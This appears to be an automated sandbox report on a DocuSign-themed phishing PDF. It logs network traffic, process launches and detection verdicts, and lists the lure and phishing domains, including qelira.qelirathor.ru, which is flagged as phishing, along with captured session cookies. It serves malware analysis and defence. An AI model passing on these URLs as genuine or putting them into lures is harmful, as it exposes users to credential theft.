    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: qelira.qelirathor.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://qelira.qelirathor.ru/1e66qhX9/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Im1pWHgrbXRlRitOUXRqOWJpT1NUbFE9PSIsInZhbHVlIjoiNlcyeElxUEhQVFpnc2xqMkZXWVFSWk41QW1oTXg1TkFaUlVyUmZDaWg0eTJRd1ZxWWxieHBRMGlVaGpvRkhCc2JqbWhFalhkZE0wa1lBa2drL1pkb010UHdwY3k5bW9leE9FOTNrVkhSb0dJWTBPVkI2V1gxcWlIR0xTQmFqMmsiLCJtYWMiOiI5MjMyYThlMjUyODc3N2YyZGM0MDM3MTkyMjFjNjVkN2VjODYxN2RiNzkyNmNiMWUyYjI0ZTc3MDlhNmM3OTU5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ikk2U2FZM2crZHBHQ1ZSRTRZWjlDQXc9PSIsInZhbHVlIjoiSG1nQWE1YnoyV2RlWCt4Q2pCL25nYkRDZ0U0MjE3NzhHb3pRemw3QkQzZjBFRk1PbHE4djZkQkpZQlNzZXEvRS9lRDFsUVFBWnlmaXBUcVRMZExFdEpmLytzeXdVaXBnZkp3bFFwblNFOGxnL0E4V0hCMVBZNjJjd2ZlbElRTy8iLCJtYWMiOiIyYTIyMzYzYmZmZTk2ZmEzYjkyOWZhNWZmNjRhZTdkZmEyNjY1MzE3YmFlOGU0MjZlNmIyNGZiNTdmYjc3NDNjIiwidGFnIjoiIn0%3D
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
    Source: global trafficDNS traffic detected: DNS query: aifunygg.planaltinashopping.com.br
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: qelira.qelirathor.ru
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/58773639:1736903612:qJGc1e2dAaYtSb8S_Pl2oWagprYsbTE0u73qNtbBmWI/902242d8f9180f6d/aVfuuxLC46yOeh14YdFyp1RNJvO.5evD5Dx3tNm6VWg-1736906310-1.1.1.1-gHdCWsDgrEoUEe038cbis_E3mVHefnMgQL5Deg5vkmDY7fx6fF4wbzi0lfy3_HDa HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3208sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: aVfuuxLC46yOeh14YdFyp1RNJvO.5evD5Dx3tNm6VWg-1736906310-1.1.1.1-gHdCWsDgrEoUEe038cbis_E3mVHefnMgQL5Deg5vkmDY7fx6fF4wbzi0lfy3_HDasec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/uz3u1/0x4AAAAAAA5OKIzF1t1zkHd6/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 01:58:32 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 04 Oct 2022 14:02:43 GMTAccept-Ranges: bytesContent-Length: 11816Vary: Accept-EncodingContent-Type: text/html
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 02:00:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zoE%2FDfIvSR3Nd1r1CiqMQFvJARc%2BYHi2NWPgdlrwkCaWYVVL8OLZGxrymBbzJN%2BD12%2BqkyBUKsk7j2BJZFuQHlrvu2nNljMZPgFBpuU%2FC37RHTfuNZMRIbAEdIgebA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4968&min_rtt=4805&rtt_var=42&sent=111&recv=69&lost=0&retrans=0&sent_bytes=111555&recv_bytes=9052&delivery_rate=7586992&cwnd=246&unsent_bytes=0&cid=266491b9652ab8c2&ts=769568&x=0"CF-Cache-Status: EXPIREDServer: cloudflareCF-RAY: 90224640994633eb-YULserver-timing: cfL4;desc="?proto=TCP&rtt=17823&min_rtt=17756&rtt_var=6706&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1906&delivery_rate=164451&cwnd=32&unsent_bytes=0&cid=dd1d57ff52ab036d&ts=2623&x=0"
    Source: chromecache_263.10.drString found in binary or memory: http://code.jquery.com/jquery-3.3.1.min.js
    Source: 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: chromecache_263.10.drString found in binary or memory: http://gmpg.org/xfn/11
    Source: 2D85F72862B55C4EADD9E66E06947F3D0.1.drString found in binary or memory: http://x1.i.lencr.org/
    Source: Final-Agreement-Document#808977735.pdfString found in binary or memory: https://aifunygg.planaltinashopping.com.br/)
    Source: chromecache_272.10.drString found in binary or memory: https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback
    Source: chromecache_271.10.dr, chromecache_277.10.drString found in binary or memory: https://qelira.qelirathor.ru/1e66qhX9/
    Source: Final-Agreement-Document#808977735.pdfString found in binary or memory: https://www.docusign.com/features-and-benefits/mobile?utm_campaign=GBL_XX_DBU_UPS_2211_SignNotificat
    Source: unknownNetwork traffic detected: HTTP traffic on port 57202 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56746 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56752
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56732 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 56747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 56737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56748 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 56740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 56744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56734
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56735
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56736
    Source: unknownNetwork traffic detected: HTTP traffic on port 56738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56737
    Source: unknownNetwork traffic detected: HTTP traffic on port 56734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56732
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56733
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56740
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 56741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 56745 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 56739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56745
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56746
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56747
    Source: unknownNetwork traffic detected: HTTP traffic on port 56735 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56748
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56742
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56743
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56744
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57202
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56751
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: classification engineClassification label: mal68.phis.winPDF@46/76@25/10
    Source: Final-Agreement-Document#808977735.pdfInitial sample: https://aifunygg.planaltinashopping.com.br/
    Source: Final-Agreement-Document#808977735.pdfInitial sample: https://www.docusign.com/features-and-benefits/mobile?utm_campaign=gbl_xx_dbu_ups_2211_signnotificationemailfooter&utm_medium=product&utm_source=postsend
    Source: Final-Agreement-Document#808977735.pdfInitial sample: https://www.docusign.com/features-and-benefits/mobile?utm_campaign=GBL_XX_DBU_UPS_2211_SignNotificationEmailFooter&utm_medium=product&utm_source=postsend
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-14 20-58-03-333.logJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Final-Agreement-Document#808977735.pdf"
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1636,i,180817469921012578,6083720237724909725,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://aifunygg.planaltinashopping.com.br/"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,15896860205605007206,14525201702814170272,262144 /prefetch:8
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1636,i,180817469921012578,6083720237724909725,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,15896860205605007206,14525201702814170272,262144 /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Final-Agreement-Document#808977735.pdfInitial sample: PDF keyword /JS count = 0
    Source: Final-Agreement-Document#808977735.pdfInitial sample: PDF keyword /JavaScript count = 0
    Source: A9i8l3qd_52seow_5x8.tmp.0.drInitial sample: PDF keyword /JS count = 0
    Source: A9i8l3qd_52seow_5x8.tmp.0.drInitial sample: PDF keyword /JavaScript count = 0
    Source: Final-Agreement-Document#808977735.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
    Source: Final-Agreement-Document#808977735.pdfInitial sample: PDF keyword obj count = 77
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire Infrastructure1
    Spearphishing Link
    Windows Management Instrumentation2
    Browser Extensions
    1
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    System Information Discovery
    Remote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    Final-Agreement-Document#808977735.pdf5%ReversingLabsDocument-PDF.Phishing.Generic
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://qelira.qelirathor.ru/favicon.ico100%Avira URL Cloudphishing
    https://aifunygg.planaltinashopping.com.br/favicon.ico0%Avira URL Cloudsafe
    https://aifunygg.planaltinashopping.com.br/main.js0%Avira URL Cloudsafe
    https://aifunygg.planaltinashopping.com.br/)0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    bg.microsoft.map.fastly.net
    199.232.210.172
    truefalse
      high
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        high
        qelira.qelirathor.ru
        188.114.96.3
        truetrue
          unknown
          code.jquery.com
          151.101.194.137
          truefalse
            high
            aifunygg.planaltinashopping.com.br
            108.179.252.84
            truefalse
              unknown
              challenges.cloudflare.com
              104.18.94.41
              truefalse
                high
                www.google.com
                142.250.186.100
                truefalse
                  high
                  x1.i.lencr.org
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://a.nel.cloudflare.com/report/v4?s=zoE%2FDfIvSR3Nd1r1CiqMQFvJARc%2BYHi2NWPgdlrwkCaWYVVL8OLZGxrymBbzJN%2BD12%2BqkyBUKsk7j2BJZFuQHlrvu2nNljMZPgFBpuU%2FC37RHTfuNZMRIbAEdIgebA%3D%3Dfalse
                      high
                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                        high
                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/902242d8f9180f6d/1736906312223/ImUa0poB2nYJac9false
                          high
                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/902245eceb0e5e66/1736906438391/wFJt-uWa1ESZ5iyfalse
                            high
                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=902242d8f9180f6d&lang=autofalse
                              high
                              https://qelira.qelirathor.ru/1e66qhX9/true
                                unknown
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/58773639:1736903612:qJGc1e2dAaYtSb8S_Pl2oWagprYsbTE0u73qNtbBmWI/902242d8f9180f6d/aVfuuxLC46yOeh14YdFyp1RNJvO.5evD5Dx3tNm6VWg-1736906310-1.1.1.1-gHdCWsDgrEoUEe038cbis_E3mVHefnMgQL5Deg5vkmDY7fx6fF4wbzi0lfy3_HDafalse
                                  high
                                  https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                    high
                                    https://aifunygg.planaltinashopping.com.br/false
                                      unknown
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/902242d8f9180f6d/1736906312225/814d7182a35543fc036a8dc4b75eac522e4260df14e17dc604468f7fd5a74ad5/telJsXeRiKVnWIpfalse
                                        high
                                        https://aifunygg.planaltinashopping.com.br/main.jsfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1761043156:1736903627:FepZ0G07M88okGs1roo1whFJjHlwkPb89wlAxNZ6XgE/902245eceb0e5e66/uhSqwIH2Glfhaq6zDtDSmuFXwPhDZ_I3zx70kKifwPg-1736906436-1.1.1.1-l2LrSWA6w7yqxXJj.BQudrtGYyrIxG9yjvullH9o2MeRea8FmWICQyeWv_ac.kLofalse
                                          high
                                          https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.jsfalse
                                            high
                                            https://aifunygg.planaltinashopping.com.br/favicon.icofalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/uz3u1/0x4AAAAAAA5OKIzF1t1zkHd6/auto/fbE/normal/auto/false
                                              high
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/902245eceb0e5e66/1736906438394/91c3e010fc3651bc618f68ca8ef2d8741d9fcaea910fdc6d25f890264a37241c/c5TG4frDM7SGrCIfalse
                                                high
                                                https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                                                  high
                                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=902245eceb0e5e66&lang=autofalse
                                                    high
                                                    https://qelira.qelirathor.ru/favicon.icofalse
                                                    • Avira URL Cloud: phishing
                                                    unknown
                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.1.drfalse
                                                      high
                                                      https://www.docusign.com/features-and-benefits/mobile?utm_campaign=GBL_XX_DBU_UPS_2211_SignNotificatFinal-Agreement-Document#808977735.pdffalse
                                                        high
                                                        http://code.jquery.com/jquery-3.3.1.min.jschromecache_263.10.drfalse
                                                          high
                                                          http://gmpg.org/xfn/11chromecache_263.10.drfalse
                                                            high
                                                            https://aifunygg.planaltinashopping.com.br/)Final-Agreement-Document#808977735.pdffalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            • No. of IPs < 25%
